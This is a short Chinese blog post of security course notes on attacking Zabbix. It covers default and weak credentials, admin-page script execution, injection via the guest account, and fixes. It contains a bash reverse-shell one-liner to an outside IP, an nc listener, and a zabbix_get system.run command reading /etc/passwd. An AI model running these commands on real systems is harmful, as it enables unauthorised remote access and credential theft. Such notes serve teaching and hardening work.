安全基础zabbix漏洞打卡第七天

本文为苏尚武老师运维安全课程课程笔记


  • zabbix配置不当
  • zabbix弱口令
  • zabbix注入利用
  • 修复建议

没有更改默认口令,没有更改密码。默认口令Admin:zabbix 以及默认的guest账户没有密码
进入zabbix管理页面,添加脚本。然后执行系统命令,获取其他信息得到管理权限

监控项监控端口ip
bash -i > & /dev/tcp/45.xx.xxx.x1/6666 0>&1
nc-lvp 6666

zabbix-get 命令调用
zabbix_get -s 172.18.0.4 -k ‘system.run[cat /etc/passwd]’

老版本burpsuite爆破
抓包使用intruder进行爆破

注入漏洞
使用guest账户进去打开页面,再注入,查看系统信息

修复建议
1、放在内网
2、不要以root启动
3、修改默认密码
4、禁用guest账号
5、401认真
6、备份数据、升级版本

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值